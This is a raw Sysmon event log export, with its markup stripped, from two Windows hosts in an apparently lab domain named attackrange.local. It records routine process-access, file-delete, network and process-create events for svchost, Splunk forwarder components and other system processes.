21:51:56.766{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918745Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:56.766{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918744Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:56.747{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23C938F95F64FD01435F71D045CB6D15,SHA256=38563F140921361E930BD898976A71C76B27402F756EDB56D97CADF9DB507FD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638907Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:56.428{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C3BCCEAC861ABC7FE5BDC0FE74CCA5E,SHA256=C8F9E7BDBA9F20D6FA7DDA95462876743137092F6711D078E1FC879E10BCE46F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000638906Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:56.224{BFB545BB-B47C-605B-395A-00000000AF01}27042708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638905Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:56.084{BFB545BB-B8FB-6058-A600-00000000AF01}8083700C:\Windows\system32\conhost.exe{BFB545BB-B47C-605B-395A-00000000AF01}2704C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638904Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:56.084{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638903Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:56.084{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638902Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:56.084{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638901Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:56.084{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638900Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:56.084{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638899Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:56.084{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638898Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:56.084{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638897Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:56.084{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638896Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:56.084{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638895Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:56.084{BFB545BB-B864-6058-0500-00000000AF01}6281076C:\Windows\system32\csrss.exe{BFB545BB-B47C-605B-395A-00000000AF01}2704C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000638894Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:56.084{BFB545BB-B8FB-6058-A200-00000000AF01}36401220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BFB545BB-B47C-605B-395A-00000000AF01}2704C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000638893Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:56.084{BFB545BB-B47C-605B-395A-00000000AF01}2704C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BFB545BB-B865-6058-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000005918752Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:57.924{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5826DFE689140C757076E9EBD94F3905,SHA256=1AF0B87EE43A2763FC6ADFF0D6BF673CD4FDE44160CB0C8C1256C444F83448DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638910Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:57.490{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DE8495677CAC4C48ECDDFDE60509B34,SHA256=98C4827AC7E235DA6353CBFA08C33FD113389A4EE638E9CA012320C2706BC712,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000005918751Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:54.691{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1064-false10.0.1.12-8000- 10341000x80000000000000005918750Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:57.766{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918749Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:57.766{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918748Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:57.032{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1E015B190FDC190DEA96DC9210BDA77B,SHA256=A29CA04A74E1D535F18929F5EE06B9B92F19C32B8B6B2870FDE8D6E899A347F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918747Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:57.031{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DCCB6DB80755D3EDBEAED5AEC6E90EC3,SHA256=86864A9FE685EB4512032B72329999BF8B3A1CE4EDB3AEFFD29A01BA4C2C5B9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638909Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:57.177{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C784145502D76C2BC34B13DE35FCBDE5,SHA256=4BD29AEA7375A50F4E4E47C894D706D1D01D7FCECE1DA2D874FA6D9F2C4A90D7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638908Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:52.550{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57279-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000005918755Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:58.929{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0A9DDE6BC0889BA09E348F1B892ACC7,SHA256=9133BBEE1A4D19AA70758C7C12CDC661F1319AEA84B439870D518663FFCD39AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638911Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:58.552{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1E43C6E0D42DE0B86B07FDEC1E3A248,SHA256=51DA59D900F4B9A213712FBC2B0B4E7E281C3B6930E2E94A9AB4659FB1431513,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918754Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:58.767{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918753Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:58.767{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000638912Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:59.740{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=113CC1CEAC3BC1C5707E0A4F001B6681,SHA256=534A969EC4D7955195DF22A2C59C491245E7AB70E75DE9A3D43FA9E9E3203CAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918757Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:59.767{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918756Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:59.767{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000638913Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:52:00.787{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 